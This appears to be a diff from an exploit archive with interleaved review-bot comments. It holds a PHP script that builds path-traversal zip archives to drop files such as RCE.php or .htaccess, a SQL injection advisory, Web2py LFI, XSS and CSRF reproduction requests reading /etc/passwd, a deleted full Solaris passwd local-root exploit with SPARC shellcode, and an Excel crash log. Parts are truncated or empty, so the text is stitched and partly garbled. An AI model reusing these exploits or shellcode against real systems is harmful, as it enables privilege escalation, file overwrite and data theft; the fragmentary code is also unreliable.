+ +[evil-archive.php] +*/ + +, , ";exit();} +$zipname=$argv[1]; +$exploit_file="RCE.php"; +$cmd=''; +if(!empty($argv[2])&&is_numeric($argv[2])){ +$depth=$argv[2]; +}else{ +echo "Second flag must be numeric!, you supplied '$argv[2]'"; +exit(); +} +if(strtolower($argv[3])!="y"){ +if(!empty($argv[3])){ +$exploit_file=$argv[3]; +} +if(!empty($argv[4])){ +$cmd=$argv[4]; +}else{ +echo "Usage: enter a payload for file $exploit_file wrapped in double +quotes"; +exit(); +} +} +$zip = new ZipArchive(); +$res = $zip->open("$zipname.zip", ZipArchive::CREATE); +$zip->addFromString(str_repeat("..\\", $depth).$exploit_file, $cmd); +$zip->close(); +echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n"; +echo "================ by hyp3rlinx ==================="; +?> + +/* +/////////////////////////////////////////////////////////////////////// + +[Script examples] + +Use default RCE.php by passing "y" flag creating DOOM.zip with path depth +of 2 levels +c:\>php evil-archive.php DOOM 2 Y + + +Create DOOM.zip with path depth of 4 levels and .htaccess file to overwrite +one on the system. +c:\>php evil-archive.php DOOM 4 .htaccess "allow from all" + + +Disclosure Timeline: +=================================== +Vendor Notification: No reply +May 14, 2016 : Public Disclosure + +Exploitation Method: +====================== +Local + +Severity Level: +================ +Medium 6.3 +CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. 
The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. + +hyp3rlinx +*/ \ No newline at end of file diff --git a/platforms/php/webapps/39817.php b/platforms/php/webapps/39817.php new file mode 100755 index 000000000..2c283d1c1 --- /dev/null +++ b/platforms/php/webapps/39817.php 
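Review bot: The advisory names the root cause (archive entry names containing `..\` segments are written relative to the extraction directory) but offers no mitigation beyond the CVE reference, and the fix is short enough to state: the extraction routine should normalise each entry name, refuse names with `..` segments, absolute paths or Windows drive-letter prefixes, and verify that the resolved destination starts with the resolved target directory before writing. The "Exploitation Method: Local" heading sits awkwardly next to reproduction steps that run entirely through the web UI (upload, then extract) and a CVSS vector of AV:L; one sentence reconciling the two would help readers assess exposure. Inferred from this listing only: the PHP between the opening `*/` and `, , ";exit();}` appears truncated, so the file as shown is not syntactically complete and should be compared against the committed content.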
@@ -0,0 +1,150 @@ +/* +[+] Credits: hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/DNS_DHCP-WEB-INTERFACE-SQL-INJECTION.txt +[+] ISR: apparitionsec + +Vendor: +==================== +tmcdos / sourceforge + +Product: +====================== +dns_dhcp Web Interface + +Download: sourceforge.net/projects/dnsmasq-mikrotik-admin/?source=directory + +This is a very simple web interface for management of static DHCP leases in +DNSmasq and Mikrotik. +It generates config files for DNSmasq and uses RouterOS API to manage +Mikrotik. Network devices (usually PCs) +are separated into subnets by department and use triplets (hostname, MAC +address, IP address) for identification. +Information is stored in MySQL. + +Vulnerability Type: +=================== +SQL Injection + +CVE Reference: +============== +N/A + +Vulnerability Details: +===================== + +The 'net' HTTP form POST parameter to dns.php script is not +checked/santized and is used directly in MySQL query allowing +attacker to easily exfiltrate any data from the backend database by using +SQL Injection exploits. + +1) On line 239 of dns.php +$b = str_replace('{FIRMA}',a_select('SUBNET',$_REQUEST['net']),$b); + +2) +dns.php line 187 the a_select function where 2nd argument $_REQUEST['net'] +is passed to an concatenated to query ($clause) +and executed on line 194 mysql_query($query). + +function a_select($tbl,$clause,$field='',$where='') +{ +if ($clause==0) return ' '; +if($field=='') $field=$tbl; +$query = "SELECT $field FROM $tbl WHERE "; +if($where=='') $query.='ID='.$clause; +else $query.=$where; +$res = mysql_query($query) or +trigger_error($query.'
'.mysql_error(),E_USER_ERROR); +if(mysql_num_rows($res)>0) return mysql_result($res,0,0); +else return ' '; +} + +Exploit code(s): +=============== + +Run from CL... +*/ + + + +/* +Disclosure Timeline: +=============================== +Vendor Notification: NA +May 14, 2016 : Public Disclosure + +Exploitation Technique: +======================= +Remote + +Severity Level: +================ +High + +Description: +================================================== +Request Method(s): [+] POST + +Vulnerable Product: [+] dns_dhcp Web Interface + +Vulnerable Parameter(s): [+] 'net' +===================================================== + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +hyp3rlinx +*/ \ No newline at end of file diff --git a/platforms/python/webapps/39821.txt b/platforms/python/webapps/39821.txt new file mode 100755 index 000000000..c550d17e2 --- /dev/null +++ b/platforms/python/webapps/39821.txt 
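Review bot: The a_select() excerpt splices `$clause` directly into `'ID='.$clause`, and the only guard, `if ($clause==0)`, is a loose comparison that does not constrain the value to an integer, so the advisory should state the fix alongside the finding. The narrow change is `if($where=='') $query.='ID='.(int)$clause;`, and the durable one is to replace the legacy `mysql_*` calls with mysqli or PDO prepared statements so `$_REQUEST['net']` is bound as a parameter rather than concatenated. The exploit-code section between `Run from CL...` and the closing comment is empty in this listing, which looks like a rendering artifact rather than the committed content and is worth checking.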
@@ -0,0 +1,104 @@
+Title - Web2py 2.14.5 Multiple Vulnerabilities LFI,XSS,CSRF
+
+# Exploit Title : Web2py 2.14.5 Multiple Vulnerabilities LFI, XSS,CSRF
+# Reported Date : 2-April-2016
+# Fixed Date : 4-April-2016
+# Exploit Author : Narendra Bhati - https://www.exploit-db.com/author/?a=7638
+# CVE ID : LFI - CVE-2016-4806 , Reflected XSS - CVE-2016-4807 , CSRF - CVE-2016-4808
+# Tested On : MAC OS X EI Capitan, Windows 7 64 Bit, Most Linux Platforms.
+# Fix/Patching : Update To Web2py. 2.14.6
+# Facebook : https://facebook.com/iambhati
+# Twitter : http://twitter.com/NarendraBhatiB
+# Detailed POC: http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
+==============================================
+
+
+LFI(Local File Inclusion): CVE-2016-4806
+
+POST URI - /admin/default/pack_custom/[applicationmame]
+
+Vulnerable Parameter = file
+
+Exploit - file=/etc/passwd
+
+Authentication Required = Yes(Administrator)
+
+Steps To Reproduction
+
+1) HTTP Request
+
+POST /admin/default/pack_custom/[applicationname] HTTP/1.1
+Host: 127.0.0.1:8000
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1:8000/admin/default/pack_custom/dasdasdasdad
+Cookie: session_id_welcome=asdadasdasdasdasd; session_id_admin=asdasdasdasdasd
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 3213
+
+file=/etc/passwd
+
+2) After sending this request, Application will prompt you with a file to download as an extension of "w2p".
+
+3) Now we have to unpack this downloaded file using. https://github.com/pigeonflight/web2py-unpacker
+
+I.e.
+Command for unpacking w2p file
+python web2py-unpacker.py downloadfile.w2p
+
+4) This command will create a folder called "unpack", In this folder there will be an another folder of the application of web2py.
In this folder you will found the etc folder, Then into this folder you will get the passwd file.
+
+
+Video POC - https://www.youtube.com/watch?v=paCvmHgomP4
+
+Full Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
+
+========================================================================
+
+Reflected XSS(Cross Site Scripting) : CVE-2016-4807
+
+GET URI - http://127.0.0.1:8000/admin/default/install_plugin/dasdasdasdad?plugin=math2py&source=anyurl
+
+Vulnerable Parameter - source
+
+Exploit - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1)
+
+Authentication Required - Yes(Administrator)
+
+Steps To Reproduction
+
+1) Go to this URL - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1)
+
+2) The parameter "source" value will get reflected on the page on "Here" button.
+
+3) When you will click on that button "Here" XSS payload will get executed.
+
+Video POC - https://www.youtube.com/watch?v=4j9hXJtVNbk
+
+Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
+
+============================================================================
+
+
+CSRF(Cross Site Request Forgery): CVE-2016-4808
+
+GET URI - http://127.0.0.1:8000/admin/default/enable/[applicationname]
+
+Exploit - http://127.0.0.1:8000/admin/default/enable/[applicationname]
+
+Authenticated Required - Yes(Administrator)
+
+
+Steps To Reproduction
+
+1) Suppose we have an application in web2py called "testingapp"
+
+2) An attacker can trick an victim to disable the installed application just By sending this URL to victim - http://127.0.0.1:8000/admin/default/enable/testingapp
+
+Video POC - https://www.youtube.com/watch?v=d4V8qlNrYtk
+
+Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
+
diff --git a/platforms/solaris/local/23765.c b/platforms/solaris/local/23765.c
deleted file mode 100755
index ccac2809d..000000000
--- a/platforms/solaris/local/23765.c
+++ /dev/null
@@ -1,574 +0,0 @@ -source: http://www.securityfocus.com/bid/9757/info - -Sun has reported an unspecified vulnerability in the passwd utility on Solaris that may permit local attackers to gain unauthorized root privileges. - -/* - * $Id: raptor_passwd.c,v 1.1 2004/12/04 14:44:38 raptor Exp $ - * - * raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9 - * Copyright (c) 2004 Marco Ivaldi - * - * Unknown vulnerability in passwd(1) in Solaris 8.0 and 9.0 allows local users - * to gain privileges via unknown attack vectors (CAN-2004-0360). - * - * "Those of you lucky enough to have your lives, take them with you. However, - * leave the limbs you've lost. They belong to me now." -- Beatrix Kidd0 - * - * This exploit uses the ret-into-ld.so technique, to effectively bypass the - * non-executable stack protection (noexec_user_stack=1 in /etc/system). The - * exploitation wasn't so straight-forward: sending parameters to passwd(1) - * is somewhat tricky, standard ret-into-stack doesn't seem to work properly - * for some reason (damn SEGV_ACCERR), and we need to bypass a lot of memory - * references before reaching ret. Many thanks to Inode . - * - * Usage: - * $ gcc raptor_passwd.c -o raptor_passwd -ldl -Wall - * $ ./raptor_passwd - * [...] 
- * # id - * uid=0(root) gid=1(other) egid=3(sys) - * # - * - * Vulnerable platforms: - * Solaris 8 with 108993-14 through 108993-31 and without 108993-32 [tested] - * Solaris 9 without 113476-11 [tested] - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define INFO1 "raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9" -#define INFO2 "Copyright (c) 2004 Marco Ivaldi " - -#define VULN "/usr/bin/passwd" // target vulnerable program -#define BUFSIZE 256 // size of the evil buffer -#define VARSIZE 1024 // size of the evil env var -#define FFSIZE 64 + 1 // size of the fake frame -#define DUMMY 0xdeadbeef // dummy memory address -#define CMD "id;uname -a;uptime;\n" // execute upon exploitation - -/* voodoo macros */ -#define VOODOO32(_,__,___) {_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;} -#define VOODOO64(_,__,___) {_+=7-(_+(__+___+1)*4+3)%8;} - -char sc[] = /* Solaris/SPARC shellcode (12 + 48 = 60 bytes) */ -/* setuid() */ -"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" -/* execve() */ -"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20" -"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14" -"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh"; - -/* globals */ -char *env[256]; -int env_pos = 0, env_len = 0; - -/* prototypes */ -int add_env(char *string); -void check_addr(int addr, char *pattern); -int find_pts(char **slave); -int search_ldso(char *sym); -int search_rwx_mem(void); -void set_val(char *buf, int pos, int val); -void shell(int fd); -int read_prompt(int fd, char *buf, int size); - -/* - * main() - */ -int main(int argc, char **argv) -{ - char buf[BUFSIZE], var[VARSIZE], ff[FFSIZE]; - char platform[256], release[256], cur_pass[256], tmp[256]; - int i, offset, ff_addr, sc_addr, var_addr; - int plat_len, prog_len, rel; - - char *arg[2] = {"foo", NULL}; - int arg_len = 4, arg_pos = 1; - - int pid, cfd, newpts; - char *newpts_str; - - int sb = ((int)argv[0] | 0xffff) & 
0xfffffffc; - int ret = search_ldso("strcpy"); - int rwx_mem = search_rwx_mem(); - - /* print exploit information */ - fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); - - /* read command line */ - if (argc != 2) { - fprintf(stderr, "usage: %s current_pass\n\n", argv[0]); - exit(1); - } - sprintf(cur_pass, "%s\n", argv[1]); - - /* get some system information */ - sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); - sysinfo(SI_RELEASE, release, sizeof(release) - 1); - rel = atoi(release + 2); - - /* prepare the evil buffer */ - memset(buf, 'A', sizeof(buf)); - buf[sizeof(buf) - 1] = 0x0; - buf[sizeof(buf) - 2] = '\n'; - - /* prepare the evil env var */ - memset(var, 'B', sizeof(var)); - var[sizeof(var) - 1] = 0x0; - - /* prepare the fake frame */ - bzero(ff, sizeof(ff)); - - /* - * saved %l registers - */ - set_val(ff, i = 0, DUMMY); /* %l0 */ - set_val(ff, i += 4, DUMMY); /* %l1 */ - set_val(ff, i += 4, DUMMY); /* %l2 */ - set_val(ff, i += 4, DUMMY); /* %l3 */ - set_val(ff, i += 4, DUMMY); /* %l4 */ - set_val(ff, i += 4, DUMMY); /* %l5 */ - set_val(ff, i += 4, DUMMY); /* %l6 */ - set_val(ff, i += 4, DUMMY); /* %l7 */ - - /* - * saved %i registers - */ - set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to strcpy() */ - set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to strcpy() */ - set_val(ff, i += 4, DUMMY); /* %i2 */ - set_val(ff, i += 4, DUMMY); /* %i3 */ - set_val(ff, i += 4, DUMMY); /* %i4 */ - set_val(ff, i += 4, DUMMY); /* %i5 */ - set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */ - set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */ - - /* fill the envp, keeping padding */ - ff_addr = add_env(var); /* var must be before ff! 
*/ - sc_addr = add_env(ff); - add_env(sc); - add_env(NULL); - - /* calculate the offset to argv[0] (voodoo magic) */ - plat_len = strlen(platform) + 1; - prog_len = strlen(VULN) + 1; - offset = arg_len + env_len + plat_len + prog_len; - if (rel > 7) - VOODOO64(offset, arg_pos, env_pos) - else - VOODOO32(offset, plat_len, prog_len) - - /* calculate the needed addresses */ - var_addr = sb - offset + arg_len; - ff_addr += var_addr; - sc_addr += var_addr; - - /* set fake frame's %i1 */ - set_val(ff, 36, sc_addr); /* 2nd arg to strcpy() */ - - /* check the addresses */ - check_addr(var_addr, "var_addr"); - check_addr(ff_addr, "ff_addr"); - - /* fill the evil buffer */ - for (i = 0; i < BUFSIZE - 4; i += 4) - set_val(buf, i, var_addr); - /* may need to bruteforce the distance here */ - set_val(buf, 112, ff_addr); - set_val(buf, 116, ret - 4); /* strcpy(), after the save */ - - /* fill the evil env var */ - for (i = 0; i < VARSIZE - 4; i += 4) - set_val(var, i, var_addr); - set_val(var, 0, 0xffffffff); /* first byte must be 0xff! 
*/ - - /* print some output */ - fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); - fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); - fprintf(stderr, "Using var address\t: 0x%p\n", (void *)var_addr); - fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); - fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr); - fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr); - fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret); - - /* find a free pts */ - cfd = find_pts(&newpts_str); - - /* fork() a new process */ - if ((pid = fork()) < 0) { - perror("fork"); - exit(1); - } - - /* parent process */ - if (pid) { - - sleep(1); - - /* wait for password prompt */ - if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) { - fprintf(stderr, "Error: timeout waiting for prompt\n"); - exit(1); - } - if (!strstr(tmp, "ssword: ")) { - fprintf(stderr, "Error: wrong prompt received\n"); - exit(1); - } - - /* send the current password */ - write(cfd, cur_pass, strlen(cur_pass)); - usleep(500000); - - /* wait for password prompt */ - if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) { - fprintf(stderr, "Error: timeout waiting for prompt\n"); - exit(1); - } - if (!strstr(tmp, "ssword: ")) { - fprintf(stderr, "Error: wrong current_pass?\n"); - exit(1); - } - - /* send the evil buffer */ - write(cfd, buf, strlen(buf)); - usleep(500000); - - /* got root? 
*/ - if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) { - fprintf(stderr, "Error: timeout waiting for shell\n"); - exit(1); - } - if (strstr(tmp, "ssword: ")) { - fprintf(stderr, "Error: not vulnerable\n"); - exit(1); - } - if (!strstr(tmp, "# ")) { - fprintf(stderr, "Something went wrong...\n"); - exit(1); - } - - /* semi-interactive shell */ - shell(cfd); - - /* child process */ - } else { - - /* start new session and get rid of controlling terminal */ - if (setsid() < 0) { - perror("setsid"); - exit(1); - } - - /* open the new pts */ - if ((newpts = open(newpts_str, O_RDWR)) < 0) { - perror("open"); - exit(1); - } - - /* ninja terminal emulation */ - ioctl(newpts, I_PUSH, "ptem"); - ioctl(newpts, I_PUSH, "ldterm"); - - /* close the child fd */ - close(cfd); - - /* duplicate stdin */ - if (dup2(newpts, 0) != 0) { - perror("dup2"); - exit(1); - } - - /* duplicate stdout */ - if (dup2(newpts, 1) != 1) { - perror("dup2"); - exit(1); - } - - /* duplicate stderr */ - if (dup2(newpts, 2) != 2) { - perror("dup2"); - exit(1); - } - - /* close the new pts */ - if (newpts > 2) - close(newpts); - - /* run the vulnerable program */ - execve(VULN, arg, env); - perror("execve"); - } - - exit(0); -} - -/* - * add_env(): add a variable to envp and pad if needed - */ -int add_env(char *string) -{ - int i; - - /* null termination */ - if (!string) { - env[env_pos] = NULL; - return(env_len); - } - - /* add the variable to envp */ - env[env_pos] = string; - env_len += strlen(string) + 1; - env_pos++; - - /* pad the envp using zeroes */ - if ((strlen(string) + 1) % 4) - for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { - env[env_pos] = string + strlen(string); - env_len++; - } - - return(env_len); -} - -/* - * check_addr(): check an address for 0x00, 0x04, 0x0a, 0x0d or 0x61-0x7a bytes - */ -void check_addr(int addr, char *pattern) -{ - /* check for NULL byte (0x00) */ - if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) || - !(addr & 0xff000000)) { - 
fprintf(stderr, "Error: %s contains a 0x00!\n", pattern); - exit(1); - } - - /* check for EOT byte (0x04) */ - if (((addr & 0xff) == 0x04) || ((addr & 0xff00) == 0x0400) || - ((addr & 0xff0000) == 0x040000) || - ((addr & 0xff000000) == 0x04000000)) { - fprintf(stderr, "Error: %s contains a 0x04!\n", pattern); - exit(1); - } - - /* check for NL byte (0x0a) */ - if (((addr & 0xff) == 0x0a) || ((addr & 0xff00) == 0x0a00) || - ((addr & 0xff0000) == 0x0a0000) || - ((addr & 0xff000000) == 0x0a000000)) { - fprintf(stderr, "Error: %s contains a 0x0a!\n", pattern); - exit(1); - } - - /* check for CR byte (0x0d) */ - if (((addr & 0xff) == 0x0d) || ((addr & 0xff00) == 0x0d00) || - ((addr & 0xff0000) == 0x0d0000) || - ((addr & 0xff000000) == 0x0d000000)) { - fprintf(stderr, "Error: %s contains a 0x0d!\n", pattern); - exit(1); - } - - /* check for lowercase chars (0x61-0x7a) */ - if ((islower(addr & 0xff)) || (islower((addr & 0xff00) >> 8)) || - (islower((addr & 0xff0000) >> 16)) || - (islower((addr & 0xff000000) >> 24))) { - fprintf(stderr, "Error: %s contains a 0x61-0x7a!\n", pattern); - exit(1); - } -} - -/* - * find_pts(): find a free slave pseudo-tty - */ -int find_pts(char **slave) -{ - int master; - extern char *ptsname(); - - /* open master pseudo-tty device and get new slave pseudo-tty */ - if ((master = open("/dev/ptmx", O_RDWR)) > 0) { - grantpt(master); - unlockpt(master); - *slave = ptsname(master); - return(master); - } - - return(-1); -} - -/* - * search_ldso(): search for a symbol inside ld.so.1 - */ -int search_ldso(char *sym) -{ - int addr; - void *handle; - Link_map *lm; - - /* open the executable object file */ - if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { - perror("dlopen"); - exit(1); - } - - /* get dynamic load information */ - if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { - perror("dlinfo"); - exit(1); - } - - /* search for the address of the symbol */ - if ((addr = (int)dlsym(handle, sym)) == NULL) { - fprintf(stderr, "sorry, 
function %s() not found\n", sym); - exit(1); - } - - /* close the executable object file */ - dlclose(handle); - - check_addr(addr - 4, sym); - return(addr); -} - -/* - * search_rwx_mem(): search for an RWX memory segment valid for all - * programs (typically, /usr/lib/ld.so.1) using the proc filesystem - */ -int search_rwx_mem(void) -{ - int fd; - char tmp[16]; - prmap_t map; - int addr = 0, addr_old; - - /* open the proc filesystem */ - sprintf(tmp,"/proc/%d/map", (int)getpid()); - if ((fd = open(tmp, O_RDONLY)) < 0) { - fprintf(stderr, "can't open %s\n", tmp); - exit(1); - } - - /* search for the last RWX memory segment before stack (last - 1) */ - while (read(fd, &map, sizeof(map))) - if (map.pr_vaddr) - if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { - addr_old = addr; - addr = map.pr_vaddr; - } - close(fd); - - /* add 4 to the exact address NULL bytes */ - if (!(addr_old & 0xff)) - addr_old |= 0x04; - if (!(addr_old & 0xff00)) - addr_old |= 0x0400; - - return(addr_old); -} - -/* - * set_val(): copy a dword inside a buffer - */ -void set_val(char *buf, int pos, int val) -{ - buf[pos] = (val & 0xff000000) >> 24; - buf[pos + 1] = (val & 0x00ff0000) >> 16; - buf[pos + 2] = (val & 0x0000ff00) >> 8; - buf[pos + 3] = (val & 0x000000ff); -} - -/* - * shell(): semi-interactive shell hack - */ -void shell(int fd) -{ - fd_set fds; - char tmp[128]; - int n; - - /* quote from kill bill: vol. 
2 */ - fprintf(stderr, "\"Pai Mei taught you the five point palm exploding heart technique?\" -- Bill\n"); - fprintf(stderr, "\"Of course.\" -- Beatrix Kidd0, alias Black Mamba, alias The Bride (KB Vol2)\n\n"); - - /* execute auto commands */ - write(1, "# ", 2); - write(fd, CMD, strlen(CMD)); - - /* semi-interactive shell */ - for (;;) { - FD_ZERO(&fds); - FD_SET(fd, &fds); - FD_SET(0, &fds); - - if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) { - perror("select"); - break; - } - - /* read from fd and write to stdout */ - if (FD_ISSET(fd, &fds)) { - if ((n = read(fd, tmp, sizeof(tmp))) < 0) { - fprintf(stderr, "Goodbye...\n"); - break; - } - if (write(1, tmp, n) < 0) { - perror("write"); - break; - } - } - - /* read from stdin and write to fd */ - if (FD_ISSET(0, &fds)) { - if ((n = read(0, tmp, sizeof(tmp))) < 0) { - perror("read"); - break; - } - if (write(fd, tmp, n) < 0) { - perror("write"); - break; - } - } - } - - close(fd); - exit(1); -} - -/* - * read_prompt(): non-blocking read from fd - */ -int read_prompt(int fd, char *buf, int size) -{ - fd_set fds; - struct timeval wait; - int n = -1; - - /* set timeout */ - wait.tv_sec = 2; - wait.tv_usec = 0; - - bzero(buf, size); - - FD_ZERO(&fds); - FD_SET(fd, &fds); - - /* select with timeout */ - if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) { - perror("select"); - exit(1); - } - - /* read data if any */ - if (FD_ISSET(fd, &fds)) - n = read(fd, buf, size); - - return n; -} diff --git a/platforms/windows/dos/39819.txt b/platforms/windows/dos/39819.txt new file mode 100755 index 000000000..8ab8a10f7 --- /dev/null +++ b/platforms/windows/dos/39819.txt 
@@ -0,0 +1,228 @@
+Microsoft Office is prone to a remote denial-of-service vulnerability.
+
+Attackers can exploit this issue to crash the affected application.
+----------------------------------------------------------------------
+Found : 11.05.2016
+More: http://HauntIT.blogspot.com
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39819.zip
+
+----------------------------------------------------------------------
+Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
+Copyright (c) Microsoft Corporation. All rights reserved.
+
+CommandLine: "c:\Program Files\Microsoft Office\Office14\excel.EXE" C:\crash\sf_e626c69c89ab9e683eed52eeaaac93ca-109922.xlsx
+Symbol search path is: *** Invalid ***
+****************************************************************************
+* Symbol loading may be unreliable without a symbol search path. *
+* Use .symfix to have the debugger choose a symbol path. *
+* After setting your symbol path, use .reload to refresh symbol locations. *
+****************************************************************************
+Executable search path is:
+ModLoad: 30000000 313d1000 Excel.exe
+ModLoad: 7c900000 7c9af000 ntdll.dll
+ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
+(...)
+ModLoad: 6bdc0000 6be7c000 C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL
+ModLoad: 65100000 6519e000 C:\Program Files\Common Files\Microsoft Shared\OFFICE14\USP10.DLL
+(cb4.854): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000001 ebx=0000000c ecx=00000000 edx=00000000 esi=0ab4aea0 edi=0000401d
+eip=44175083 esp=0013e3a8 ebp=0013e3a8 iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
+*** ERROR: Symbol file could not be found.
Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\OFFICE14\OGL.DLL -
+OGL!GdipGetImageThumbnail+0x1118e:
+44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
+
+0:000> r;!exploitable -v;r;ub;kv;q
+eax=00000001 ebx=0000000c ecx=00000000 edx=00000000 esi=0ab4aea0 edi=0000401d
+eip=44175083 esp=0013e3a8 ebp=0013e3a8 iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
+OGL!GdipGetImageThumbnail+0x1118e:
+44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
+
+!exploitable 1.6.0.0
+HostMachine\HostUser
+Executing Processor Architecture is x86
+Debuggee is in User Mode
+Debuggee is a live user mode debugging session on the local machine
+Event Type: Exception
+(...)
+Exception Faulting Address: 0x4
+First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
+Exception Sub-Type: Read Access Violation
+
+Faulting Instruction:44175083 push dword ptr [ecx+4]
+
+Basic Block:
+ 44175083 push dword ptr [ecx+4]
+ Tainted Input operands: 'ecx'
+ 44175086 push dword ptr [ecx]
+ Tainted Input operands: 'ecx'
+ 44175088 mov ecx,dword ptr [ebp+8]
+ 4417508b mov eax,dword ptr [ecx]
+ 4417508d call dword ptr [eax+4]
+ Tainted Input operands: 'StackContents'
+
+Exception Hash (Major/Minor): 0xd8abe4f2.0x3a6d64a1
+
+ Hash Usage : Stack Trace:
+Major+Minor : OGL!GdipGetImageThumbnail+0x1118e
+Major+Minor : OGL!GdipGetPathPointsI+0x2da6
+Major+Minor : OGL!GdipGetPathPointsI+0x2b0e
+Major+Minor : OGL!GdipGetPathPointsI+0x2a98
+Major+Minor : GDI32!SetMetaRgn+0x87
+Minor : OGL!GdipCreateMetafileFromWmfFile+0x652
+Minor : OGL!GdipGetPathPointsI+0x2d1b
+Minor : OGL!GdipGetPathPointsI+0x2b73
+Minor : OGL!GdipCreateMetafileFromWmfFile+0x573
+Minor : OGL!GdipGetVisibleClipBoundsI+0x1c6
+Minor : OGL!GdipDrawImageRectRect+0x111
+Minor : gfx+0x147d74
+Minor : gfx+0x4f9f
+Minor : gfx+0x13ec8
+Minor : gfx+0x13ec8
+Minor : gfx+0x13ec8
+Minor : gfx+0x4ecd
+Minor : gfx+0xed1a
+Minor : gfx+0xecef
+Minor :
gfx+0xecc3
+Minor : gfx+0xf6fc
+Minor : gfx+0xe84d
+Minor : gfx+0xf4db
+Minor : gfx+0xe84d
+Minor : gfx+0xf685
+Minor : gfx+0xe817
+Minor : gfx+0xebd8
+Minor : oart!Ordinal3680+0xb8
+Minor : oart!Ordinal1491+0x156
+Minor : Excel!Ordinal40+0x20d620
+Minor : Excel!Ordinal40+0x1f8e2c
+Minor : Excel!Ordinal40+0x60961
+Minor : Excel!Ordinal40+0x607aa
+Minor : Excel!Ordinal40+0x5e95b
+Minor : Excel!Ordinal40+0x5e76f
+Minor : Excel!Ordinal40+0x2f054
+Minor : Excel!Ordinal40+0x1763d
+Minor : USER32!GetDC+0x6d
+Minor : USER32!GetDC+0x14f
+Minor : USER32!IsWindowUnicode+0xa1
+Minor : USER32!CallWindowProcW+0x1b
+Minor : Comctl32!Ordinal11+0x328
+Minor : Comctl32!RemoveWindowSubclass+0x17e
+Minor : Comctl32!DefSubclassProc+0x46
+Minor : mso!Ordinal1888+0x38e
+Minor : mso!Ordinal4894+0x24b
+Minor : Comctl32!RemoveWindowSubclass+0x17e
+Minor : Comctl32!DefSubclassProc+0xa9
+Minor : USER32!GetDC+0x6d
+Minor : USER32!GetDC+0x14f
+Minor : USER32!DefWindowProcW+0x180
+Minor : USER32!DefWindowProcW+0x1cc
+Minor : ntdll!KiUserCallbackDispatcher+0x13
